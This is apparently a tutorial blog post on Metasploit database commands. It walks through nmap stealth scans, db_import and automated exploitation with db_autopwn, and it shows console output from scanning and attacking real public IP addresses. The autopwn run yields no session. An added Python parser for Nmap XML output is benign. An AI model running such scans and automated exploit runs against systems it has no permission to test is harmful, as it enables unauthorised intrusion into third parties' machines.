Checking the Metasploit database connection status: Metasploit 4.0 and later versions connect to the bundled database automatically, so loading db_mysql and then running db_connect, as was done before, is no longer necessary.
[bash]
msf > db_status
[*] postgresql connected to msf3dev
[/bash]
To see the commands starting with db_, type db_ and press Tab twice; you get the following:
[bash]
msf > db_
db_connect     db_export      db_nmap           db_status
db_disconnect  db_import      db_rebuild_cache
[/bash]
Of course, using the help command works just as well.
[bash]
msf > help
Core Commands
=============
Command       Description
-------       -----------
?             Help menu
back          Move back from the current context
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
exit          Exit the console
help          Help menu
info          Displays information about one or more module
irb           Drop into irb scripting mode
jobs          Displays and manages jobs
kill          Kill a job
load          Load a framework plugin
loadpath      Searches for and loads modules from a path
makerc        Save commands entered since start to a file
popm          Pops the latest module off of the module stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
quit          Exit the console
reload_all    Reloads all modules from all defined module paths
resource      Run the commands stored in a file
route         Route traffic through a session
save          Saves the active datastores
search        Searches module names and descriptions
sessions      Dump session listings and display information about sessions
set           Sets a variable to a value
setg          Sets a global variable to a value
show          Displays modules of a given type, or all modules
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
unload        Unload a framework plugin
unset         Unsets one or more variables
unsetg        Unsets one or more global variables
use           Selects a module by name
version       Show the framework and console library version numbers
Database Backend Commands
=========================
Command           Description
-------           -----------
creds             List all credentials in the database
db_connect        Connect to an existing database
db_disconnect     Disconnect from the current database instance
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache
db_status         Show the current database status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces
msf >
[/bash]
db_nmap is used for port scanning and service discovery on hosts. The commonly used parameters are:
-A : in-depth scan
-sS : tries to hide itself while scanning. Cannot be used together with -sI <some-ip>.
-sI <some-ip> : uses this "some-ip" as your own IP during the scan; anyone looking will only see that "some-ip" scanning them.
-oX <filename> : exports the scan results to the file "filename", so that you can import the results into Metasploit with db_import and then use db_autopwn to attack automatically, right?
-Pn : no ping. Does not use ping to decide whether a host is alive before scanning. Long, long ago, using ping to decide whether a host was alive was feasible and reliable. But ever since some guru discovered that ping can be used to launch DDoS attacks, the ping protocol has been improved and guarded against. So, a host that does not answer ping is not necessarily down. You know what I mean.
Oh, and there is one more important parameter:
-v : shows scan progress. Otherwise you will think nmap has died and impatiently Ctrl-C it.
So, an example of a commonly used scan command:
[bash]
msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51
# a large chunk omitted
[/bash]
Then comes
db_import ieroot
The ieroot file is the result of the nmap scan above. Because that scan was run as plain nmap from the console (msf hands unknown commands to the shell, hence the "[*] exec:" line) rather than as db_nmap, its results are not in the database yet, so they have to be imported.
Then comes:
load db_autopwn
db_autopwn then automatically scans for exploitable hosts.
A few commonly used db_autopwn parameters, explained:
-e : launch attacks against every host in the scan results stored in the database
-t : show all matching modules
-r : use a reverse connection. Reverse connections have their advantages; use this parameter to get through firewalls.
-x : select exploit modules by vulnerability
-p : select exploit modules by port. Many hosts have their service ports changed into a complete mess, so be careful when using -p.
So the procedure is as follows:
[bash]
msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE        VERSION
21/tcp   closed ftp
80/tcp   closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)
Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts
Hosts
=====
address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------
msf > db_import ieroot
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts
Hosts
=====
address         mac  name                             os_name      os_flavor  os_sp  purpose  info  comments
-------         ---  ----                             -------      ---------  -----  -------  ----  --------
108.171.217.51       108-171-217-51.static.webnx.com  Sun Solaris  9                 device
msf >
[/bash]
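The -oX file that db_import reads above is Nmap's XML format. The following parser is an added example (not code from the original post and not Metasploit's own Rex::Parser::NmapXMLStreamParser); it turns an Nmap XML document into rows shaped like the hosts and services tables shown above, so you can see which fields db_import actually picks up (address, MAC, PTR name, OS vendor/family/generation, and per-port state and service). The XML document embedded in it is constructed for the example; the Solaris host mirrors the scan shown on this page, the two 192.0.2.x hosts are invented to show a down host being skipped and open ports with version info.

```python
"""Parse Nmap XML (what `nmap -oX` writes and `db_import` reads) into
host/service rows resembling msfconsole's `hosts` and `services` tables.
Added example; the sample document below is constructed, not a real scan."""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

# Constructed sample: first host mirrors the page's scan of 108.171.217.51,
# the 192.0.2.x hosts are invented (documentation address range).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -sS -A -Pn -v -oX ieroot 108.171.217.51" version="5.51SVN">
<host>
  <status state="up" reason="user-set"/>
  <address addr="108.171.217.51" addrtype="ipv4"/>
  <hostnames><hostname name="108-171-217-51.static.webnx.com" type="PTR"/></hostnames>
  <ports>
    <extraports state="filtered" count="997"/>
    <port protocol="tcp" portid="21"><state state="closed" reason="reset"/><service name="ftp" method="table" conf="3"/></port>
    <port protocol="tcp" portid="80"><state state="closed" reason="reset"/><service name="http" method="table" conf="3"/></port>
    <port protocol="tcp" portid="8888"><state state="closed" reason="reset"/><service name="sun-answerbook" method="table" conf="3"/></port>
  </ports>
  <os>
    <osmatch name="Sun Solaris 9" accuracy="100">
      <osclass type="general purpose" vendor="Sun" osfamily="Solaris" osgen="9" accuracy="100"/>
    </osmatch>
  </os>
</host>
<host>
  <status state="down" reason="no-response"/>
  <address addr="192.0.2.10" addrtype="ipv4"/>
</host>
<host>
  <status state="up" reason="syn-ack"/>
  <address addr="192.0.2.11" addrtype="ipv4"/>
  <address addr="00:11:22:33:44:55" addrtype="mac"/>
  <ports>
    <port protocol="tcp" portid="53"><state state="open" reason="syn-ack"/><service name="domain" product="ISC BIND" version="9.8.1" method="probed" conf="10"/></port>
    <port protocol="tcp" portid="443"><state state="open" reason="syn-ack"/><service name="https" method="table" conf="3"/></port>
  </ports>
</host>
</nmaprun>
"""


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    info: str  # product/version text, like the services table's "info" column


@dataclass
class Host:
    address: str
    mac: str = ""
    name: str = ""
    os_name: str = ""
    os_flavor: str = ""
    services: list = field(default_factory=list)


def parse_nmap_xml(xml_text: str) -> list:
    """Return one Host per host Nmap reported as up, with its ports attached."""
    root = ET.fromstring(xml_text)
    if root.tag != "nmaprun":
        raise ValueError("not an Nmap XML document")
    hosts = []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue  # skip down hosts; the scan above only yielded a row for the up host
        host = Host(address="")
        for a in h.findall("address"):
            if a.get("addrtype") == "mac":
                host.mac = a.get("addr", "")
            else:
                host.address = a.get("addr", "")
        hn = h.find("hostnames/hostname")
        if hn is not None:
            host.name = hn.get("name", "")
        # OS: pick the highest-accuracy <osclass>. iter() finds it whether it sits
        # beside <osmatch> (Nmap 5.x layout) or nested inside it (Nmap 6+ layout).
        best = None
        for oc in h.iter("osclass"):
            acc = int(oc.get("accuracy", "0"))
            if best is None or acc > best[0]:
                best = (acc, oc)
        if best is not None:
            oc = best[1]
            host.os_name = f"{oc.get('vendor', '')} {oc.get('osfamily', '')}".strip()
            host.os_flavor = oc.get("osgen", "")
        for p in h.findall("ports/port"):
            st = p.find("state")
            svc = p.find("service")
            info = ""
            if svc is not None:
                info = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            host.services.append(Service(
                port=int(p.get("portid")),
                proto=p.get("protocol", "tcp"),
                state=st.get("state", "") if st is not None else "",
                name=svc.get("name", "") if svc is not None else "",
                info=info))
        hosts.append(host)
    return hosts


def open_services(hosts: list) -> list:
    """(address, port, proto, name, info) tuples for open ports only."""
    return [(h.address, s.port, s.proto, s.name, s.info)
            for h in hosts for s in h.services if s.state == "open"]


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    print("address          mac                name                              os_name      os_flavor")
    for h in parsed:
        print(f"{h.address:16} {h.mac:18} {h.name:33} {h.os_name:12} {h.os_flavor}")
    for row in open_services(parsed):
        print("open:", row)
```

Run it against a real file with `parse_nmap_xml(open("ieroot").read())`; the three closed ports on the Solaris host are kept as services (Metasploit stores closed ports too) but filtered out by open_services, which is the view you usually want before deciding what to look at next.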
[bash]
msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it's current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions
msf > sessions -l
Active sessions
===============
No active sessions.
msf > hosts -d
Hosts
=====
address         mac  name                             os_name      os_flavor  os_sp  purpose  info  comments
-------         ---  ----                             -------      ---------  -----  -------  ----  --------
108.171.217.51       108-171-217-51.static.webnx.com  Sun Solaris  9                 device
[*] Deleted 1 hosts
msf >
[/bash]
A session is not easy to get. If you do get one, use sessions -i 1 to connect to the first session, and so on for the others. Once you have a shell, there is nothing more to say.